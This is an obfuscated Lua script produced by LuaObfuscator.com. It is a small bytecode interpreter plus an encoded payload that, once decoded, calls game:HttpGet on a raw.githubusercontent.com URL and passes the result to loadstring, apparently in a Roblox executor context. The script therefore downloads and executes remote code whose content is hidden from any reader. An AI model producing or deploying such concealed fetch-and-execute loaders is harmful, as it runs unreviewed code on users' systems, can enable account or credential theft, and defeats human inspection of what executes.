--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do
	local v0 = tonumber;
	local v1 = string.byte;
	local v2 = string.char;
	local v3 = string.sub;
	local v4 = string.gsub;
	local v5 = string.rep;
	local v6 = table.concat;
	local v7 = table.insert;
	local v8 = math.ldexp;
	local v9 = getfenv or function()
		return _ENV;
	end;
	local v10 = setmetatable;
	local v11 = pcall;
	local v12 = select;
	local v13 = unpack or table.unpack;
	local v14 = tonumber;
	local function v15(v16, v17, ...)
		local v18 = 1;
		local v19;
		v16 = v4(v3(v16, 5), "..", function(v30)
			if (v1(v30, 2) == 79) then
				local v67 = 0;
				while true do
					if (v67 == 0) then
						v19 = v0(v3(v30, 1, 1));
						return "";
					end
				end
			else
				local v68 = 0;
				local v69;
				while true do
					if (v68 == 0) then
						v69 = v2(v0(v30, 16));
						if v19 then
							local v96 = v5(v69, v19);
							v19 = nil;
							return v96;
						else
							return v69;
						end
						break;
					end
				end
			end
		end);
		local function v20(v31, v32, v33)
			if v33 then
				local v70 = (v31 / ((5 - (1 + 2)) ^ (v32 - (2 - (878 - (282 + 595)))))) % ((3 - 1) ^ (((v33 - (2 - 1)) - (v32 - ((2257 - (1523 + 114)) - (499 + 56 + 64)))) + (932 - (857 + 74))));
				return v70 - (v70 % 1);
			else
				local v71 = 2 ^ (v32 - (569 - ((523 - 156) + 201)));
				return (((v31 % (v71 + v71)) >= v71) and (928 - (214 + 713))) or (0 + 0);
			end
		end
		local function v21()
			local v34 = 0;
			local v35;
			while true do
				if (v34 == (1066 - (68 + 997))) then
					return v35;
				end
				if (v34 == 0) then
					v35 = v1(v16, v18, v18);
					v18 = v18 + (1271 - ((343 - (32 + 85)) + 1044));
					v34 = (4 + 0) - 3;
				end
			end
		end
		local function v22()
			local v36, v37 = v1(v16, v18, v18 + 1 + 1);
			v18 = v18 + (4 - 2);
			return (v37 * (472 - 216)) + v36;
		end
		local function v23()
			local v38, v39, v40, v41 = v1(v16, v18, v18 + (4 - (1 + 0)));
			v18 = v18 + 4;
			return (v41 * 16777216) + (v40 * (65886 - (87 + 263))) + (v39 * (436 - (67 + 113))) + v38;
		end
		local function v24()
			local v42 = v23();
			local v43 = v23();
			local v44 = 2 - 1;
			local v45 = (v20(v43, 1 + 0, 79 - 59) * ((954 - (802 + 150)) ^ (85 - 53))) + v42;
			local v46 = v20(v43, 37 - 16, 23 + 8);
			local v47 = ((v20(v43, 1029 - ((933 - (10 + 8)) + 82)) == (2 - 1)) and -(1 + 0)) or (1 - 0);
			if (v46 == 0) then
				if (v45 == (1187 - ((4111 - 3042) + 118))) then
					return v47 * ((442 - (416 + 26)) - 0);
				else
					v46 = 1 - 0;
					v44 = (0 - 0) + 0 + 0;
				end
			elseif (v46 == (3636 - 1589)) then
				return ((v45 == (0 + 0)) and (v47 * ((792 - (368 + 423)) / 0))) or (v47 * NaN);
			end
			return v8(v47, v46 - 1023) * (v44 + (v45 / (((9 - 3) - 4) ^ 52)));
		end
		local function v25(v48)
			local v49 = 438 - (145 + 293);
			local v50;
			local v51;
			while true do
				if (v49 == (431 - (44 + 386))) then
					v50 = v3(v16, v18, (v18 + v48) - (1 + 0));
					v18 = v18 + v48;
					v49 = 2;
				end
				if (v49 == ((5435 - 3946) - (998 + 488))) then
					return v6(v51);
				end
				if (v49 == (0 + 0)) then
					v50 = nil;
					if not v48 then
						v48 = v23();
						if (v48 == (0 + 0)) then
							return "";
						end
					end
					v49 = 773 - (201 + 571);
				end
				if (v49 == (1140 - (116 + 1022))) then
					v51 = {};
					for v75 = 1, #v50 do
						v51[v75] = v2(v1(v3(v50, v75, v75)));
					end
					v49 = 12 - 9;
				end
			end
		end
		local v26 = v23;
		local function v27(...)
			return {...}, v12("#", ...);
		end
		local function v28()
			local v52 = 0 - 0;
			local v53;
			local v54;
			local v55;
			local v56;
			local v57;
			local v58;
			local v59;
			while true do
				if (v52 == 3) then
					v59 = nil;
					while true do
						local v77 = 241 - (187 + 54);
						local v78;
						while true do
							if (v77 ~= (780 - (162 + 618))) then
							else
								v78 = 0 + 0;
								while true do
									if (v78 ~= (0 + 0)) then
									else
										local v101 = 0;
										while true do
											if (v101 ~= (1 - 0)) then
											else
												v78 = 1;
												break;
											end
											if (v101 == (0 - 0)) then
												if (v53 ~= (1 + 1)) then
												else
													local v138 = 1636 - (1373 + 263);
													while true do
														if (v138 == (1000 - (451 + 549))) then
															for v151 = 1, v23() do
																local v152 = 0 + 0;
																local v153;
																local v154;
																local v155;
																while true do
																	if (v152 == (0 - 0)) then
																		v153 = 0 - 0;
																		v154 = nil;
																		v152 = 1;
																	end
																	if (v152 == 1) then
																		v155 = nil;
																		while true do
																			if (v153 ~= 0) then
																			else
																				local v158 = 1384 - (746 + 638);
																				while true do
																					if (0 == v158) then
																						v154 = 0;
																						v155 = nil;
																						v158 = 1 + 0;
																					end
																					if (1 ~= v158) then
																					else
																						v153 = 1 - 0;
																						break;
																					end
																				end
																			end
																			if ((342 - (218 + 123)) ~= v153) then
																			else
																				while true do
																					if (v154 ~= 0) then
																					else
																						v155 = v21();
																						if (v20(v155, 1, 1582 - (1535 + 46)) ~= (0 + 0)) then
																						else
																							local v162 = 0;
																							local v163;
																							local v164;
																							local v165;
																							local v166;
																							local v167;
																							while true do
																								if (v162 ~= (1 + 1)) then
																								else
																									v167 = nil;
																									while true do
																										if (v163 ~= 1) then
																										else
																											v166 = nil;
																											v167 = nil;
																											v163 = 2;
																										end
																										if (v163 == 0) then
																											local v168 = 0;
																											while true do
																												if (v168 ~= 1) then
																												else
																													v163 = 1;
																													break;
																												end
																												if (v168 ~= 0) then
																												else
																													v164 = 560 - (306 + 254);
																													v165 = nil;
																													v168 = 1 + 0;
																												end
																											end
																										end
																										if (v163 == (3 - 1)) then
																											while true do
																												if (v164 == 2) then
																													local v169 = 1467 - (899 + 568);
																													local v170;
																													while true do
																														if (v169 == 0) then
																															v170 = 0 + 0;
																															while true do
																																if (v170 == 0) then
																																	local v179 = 0 - 0;
																																	while true do
																																		if (v179 ~= 1) then
																																		else
																																			v170 = 1;
																																			break;
																																		end
																																		if (v179 ~= 0) then
																																		else
																																			if (v20(v166, 1, 604 - (268 + 335)) == (291 - (60 + 230))) then
																																				v167[574 - (426 + 146)] = v59[v167[1 + 1]];
																																			end
																																			if (v20(v166, 2, 1458 - (282 + 1174)) ~= (812 - (569 + 242))) then
																																			else
																																				v167[3] = v59[v167[3]];
																																			end
																																			v179 = 1;
																																		end
																																	end
																																end
																																if (v170 ~= (2 - 1)) then
																																else
																																	v164 = 3;
																																	break;
																																end
																															end
																															break;
																														end
																													end
																												end
																												if (v164 ~= 0) then
																												else
																													local v171 = 0 + 0;
																													local v172;
																													while true do
																														if (v171 == (1024 - (706 + 318))) then
																															v172 = 1251 - (721 + 530);
																															while true do
																																if (v172 ~= 1) then
																																else
																																	v164 = 1272 - (945 + 326);
																																	break;
																																end
																																if ((0 - 0) == v172) then
																																	local v180 = 0 + 0;
																																	while true do
																																		if (v180 == (701 - (271 + 429))) then
																																			v172 = 1;
																																			break;
																																		end
																																		if (v180 == (0 + 0)) then
																																			local v181 = 1500 - (1408 + 92);
																																			while true do
																																				if (v181 ~= 0) then
																																				else
																																					v165 = v20(v155, 1088 - (461 + 625), 1291 - (993 + 295));
																																					v166 = v20(v155, 1 + 3, 6);
																																					v181 = 1;
																																				end
																																				if (v181 == (1172 - (418 + 753))) then
																																					v180 = 1 + 0;
																																					break;
																																				end
																																			end
																																		end
																																	end
																																end
																															end
																															break;
																														end
																													end
																												end
																												if (v164 ~= 1) then
																												else
																													local v173 = 0;
																													local v174;
																													local v175;
																													while true do
																														if (v173 == 0) then
																															v174 = 0 + 0;
																															v175 = nil;
																															v173 = 1 + 0;
																														end
																														if (v173 ~= 1) then
																														else
																															while true do
																																if (v174 ~= (0 + 0)) then
																																else
																																	v175 = 0;
																																	while true do
																																		if (v175 == (529 - (406 + 123))) then
																																			local v182 = 0;
																																			while true do
																																				if (v182 == 1) then
																																					v175 = 1;
																																					break;
																																				end
																																				if ((1769 - (1749 + 20)) == v182) then
																																					v167 = {v22(),v22(),nil,nil};
																																					if (v165 == (1145 - (466 + 679))) then
																																						local v187 = 0;
																																						local v188;
																																						while true do
																																							if (v187 == (0 - 0)) then
																																								v188 = 0;
																																								while true do
																																									if (v188 ~= (0 - 0)) then
																																									else
																																										v167[3] = v22();
																																										v167[4] = v22();
																																										break;
																																									end
																																								end
																																								break;
																																							end
																																						end
																																					elseif (v165 == 1) then
																																						v167[1903 - (106 + 1794)] = v23();
																																					elseif (v165 == (1 + 1)) then
																																						v167[1 + 2] = v23() - ((5 - 3) ^ (43 - 27));
																																					elseif (v165 ~= 3) then
																																					else
																																						local v193 = 114 - (4 + 110);
																																						while true do
																																							if (v193 ~= (584 - (57 + 527))) then
																																							else
																																								v167[1430 - (41 + 1386)] = v23() - ((105 - (17 + 86)) ^ (11 + 5));
																																								v167[8 - 4] = v22();
																																								break;
																																							end
																																						end
																																					end
																																					v182 = 2 - 1;
																																				end
																																			end
																																		end
																																		if (v175 ~= (167 - (122 + 44))) then
																																		else
																																			v164 = 2;
																																			break;
																																		end
																																	end
																																	break;
																																end
																															end
																															break;
																														end
																													end
																												end
																												if (v164 == (5 - 2)) then
																													if (v20(v166, 9 - 6, 3 + 0) ~= 1) then
																													else
																														v167[1 + 3] = v59[v167[4]];
																													end
																													v54[v151] = v167;
																													break;
																												end
																											end
																											break;
																										end
																									end
																									break;
																								end
																								if (v162 == (1 - 0)) then
																									v165 = nil;
																									v166 = nil;
																									v162 = 67 - (30 + 35);
																								end
																								if (v162 ~= (0 + 0)) then
																								else
																									v163 = 1257 - (1043 + 214);
																									v164 = nil;
																									v162 = 3 - 2;
																								end
																							end
																						end
																						break;
																					end
																				end
																				break;
																			end
																		end
																		break;
																	end
																end
															end
															for v156 = 1213 - (323 + 889), v23() do
																v55[v156 - 1] = v28();
															end
															v138 = 2 - 1;
														end
														if (1 ~= v138) then
														else
															return v57;
														end
													end
												end
												if (v53 == 1) then
													v58 = v23();
													v59 = {};
													for v143 = 1, v58 do
														local v144 = 580 - (361 + 219);
														local v145;
														local v146;
														local v147;
														local v148;
														while true do
															if (0 ~= v144) then
															else
																v145 = 0;
																v146 = nil;
																v144 = 1;
															end
															if (v144 == (321 - (53 + 267))) then
																v147 = nil;
																v148 = nil;
																v144 = 1 + 1;
															end
															if (v144 ~= 2) then
															else
																while true do
																	if (v145 ~= (413 - (15 + 398))) then
																	else
																		v146 = 0;
																		v147 = nil;
																		v145 = 983 - (18 + 964);
																	end
																	if (v145 ~= (3 - 2)) then
																	else
																		v148 = nil;
																		while true do
																			if (v146 ~= 1) then
																			else
																				if (v147 == 1) then
																					v148 = v21() ~= 0;
																				elseif (v147 == 2) then
																					v148 = v24();
																				elseif (v147 ~= (2 + 1)) then
																				else
																					v148 = v25();
																				end
																				v59[v143] = v148;
																				break;
																			end
																			if (v146 == (0 + 0)) then
																				local v160 = 850 - (20 + 830);
																				while true do
																					if (v160 == 1) then
																						v146 = 1;
																						break;
																					end
																					if (v160 ~= (0 + 0)) then
																					else
																						local v161 = 126 - (116 + 10);
																						while true do
																							if (1 == v161) then
																								v160 = 1;
																								break;
																							end
																							if ((0 + 0) == v161) then
																								v147 = v21();
																								v148 = nil;
																								v161 = 739 - (542 + 196);
																							end
																						end
																					end
																				end
																			end
																		end
																		break;
																	end
																end
																break;
															end
														end
													end
													v57[6 - 3] = v21();
													v53 = 1 + 1;
												end
												v101 = 1 + 0;
											end
										end
									end
									if ((1 + 0) ~= v78) then
									else
										if ((0 - 0) ~= v53) then
										else
											local v109 = 0 - 0;
											while true do
												if (v109 ~= (1551 - (1126 + 425))) then
												else
													v54 = {};
													v55 = {};
													v109 = 1;
												end
												if (v109 == (406 - (118 + 287))) then
													v56 = {};
													v57 = {v54,v55,nil,v56};
													v109 = 379 - (142 + 235);
												end
												if (v109 == (9 - 7)) then
													v53 = 1;
													break;
												end
											end
										end
										break;
									end
								end
								break;
							end
						end
					end
					break;
				end
				if ((1 + 0) == v52) then
					v55 = nil;
					v56 = nil;
					v52 = 979 - (553 + 424);
				end
				if (v52 ~= 2) then
				else
					v57 = nil;
					v58 = nil;
					v52 = 3;
				end
				if (v52 ~= 0) then
				else
					v53 = 0 - 0;
					v54 = nil;
					v52 = 1;
				end
			end
		end
		local function v29(v60, v61, v62)
			local v63 = 0;
			local v64;
			local v65;
			local v66;
			while true do
				if (v63 == 1) then
					v66 = v60[3];
					return function(...)
						local v79 = v64;
						local v80 = v65;
						local v81 = v66;
						local v82 = v27;
						local v83 = 1;
						local v84 = -1;
						local v85 = {};
						local v86 = {...};
						local v87 = v12("#", ...) - 1;
						local v88 = {};
						local v89 = {};
						for v93 = 0, v87 do
							if (v93 >= v81) then
								v85[v93 - v81] = v86[v93 + 1];
							else
								v89[v93] = v86[v93 + 1];
							end
						end
						local v90 = (v87 - v81) + 1;
						local v91;
						local v92;
						while true do
							v91 = v79[v83];
							v92 = v91[1];
							if (v92 <= 6) then
								if (v92 <= 2) then
									if (v92 <= 0) then
										v89[v91[2]] = v62[v91[3]];
									elseif (v92 > 1) then
										local v110 = v91[2];
										local v111 = v89[v91[3]];
										v89[v110 + 1] = v111;
										v89[v110] = v111[v91[4]];
									else
										local v115 = v91[2];
										v89[v115] = v89[v115](v13(v89, v115 + 1, v84));
									end
								elseif (v92 <= 4) then
									if (v92 > 3) then
										v89[v91[2]]();
									else
										v89[v91[2]] = v62[v91[3]];
									end
								elseif (v92 == 5) then
									do
										return;
									end
								else
									v89[v91[2]] = v91[3];
								end
							elseif (v92 <= 9) then
								if (v92 <= 7) then
									local v104 = 0;
									local v105;
									local v106;
									local v107;
									local v108;
									while true do
										if (v104 == 1) then
											v84 = (v107 + v105) - 1;
											v108 = 0;
											v104 = 2;
										end
										if (2 == v104) then
											for v140 = v105, v84 do
												v108 = v108 + 1;
												v89[v140] = v106[v108];
											end
											break;
										end
										if (v104 == 0) then
											v105 = v91[2];
											v106, v107 = v82(v89[v105](v13(v89, v105 + 1, v91[3])));
											v104 = 1;
										end
									end
								elseif (v92 == 8) then
									do
										return;
									end
								else
									v89[v91[2]] = v91[3];
								end
							elseif (v92 <= 11) then
								if (v92 == 10) then
									local v123 = v91[2];
									local v124 = v89[v91[3]];
									v89[v123 + 1] = v124;
									v89[v123] = v124[v91[4]];
								else
									local v128 = v91[2];
									local v129, v130 = v82(v89[v128](v13(v89, v128 + 1, v91[3])));
									v84 = (v130 + v128) - 1;
									local v131 = 0;
									for v135 = v128, v84 do
										v131 = v131 + 1;
										v89[v135] = v129[v131];
									end
								end
							elseif (v92 > 12) then
								v89[v91[2]]();
							else
								local v132 = 0;
								local v133;
								while true do
									if (v132 == 0) then
										v133 = v91[2];
										v89[v133] = v89[v133](v13(v89, v133 + 1, v84));
										break;
									end
								end
							end
							v83 = v83 + 1;
						end
					end;
				end
				if (0 == v63) then
					v64 = v60[1];
					v65 = v60[2];
					v63 = 1;
				end
			end
		end
		return v29(v28(), {}, v17)(...);
	end
	v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F526F626C6F7849444775626B756B2F736E6A646A736E646D646B2O642F6D61696E2F4E656A666B666E656B676E666A656B6700083O0012033O00013O001203000100023O002002000100010003001206000300044O000B000100034O000C5O00022O000D3O000100012O00083O00017O00", v9(), ...);
end
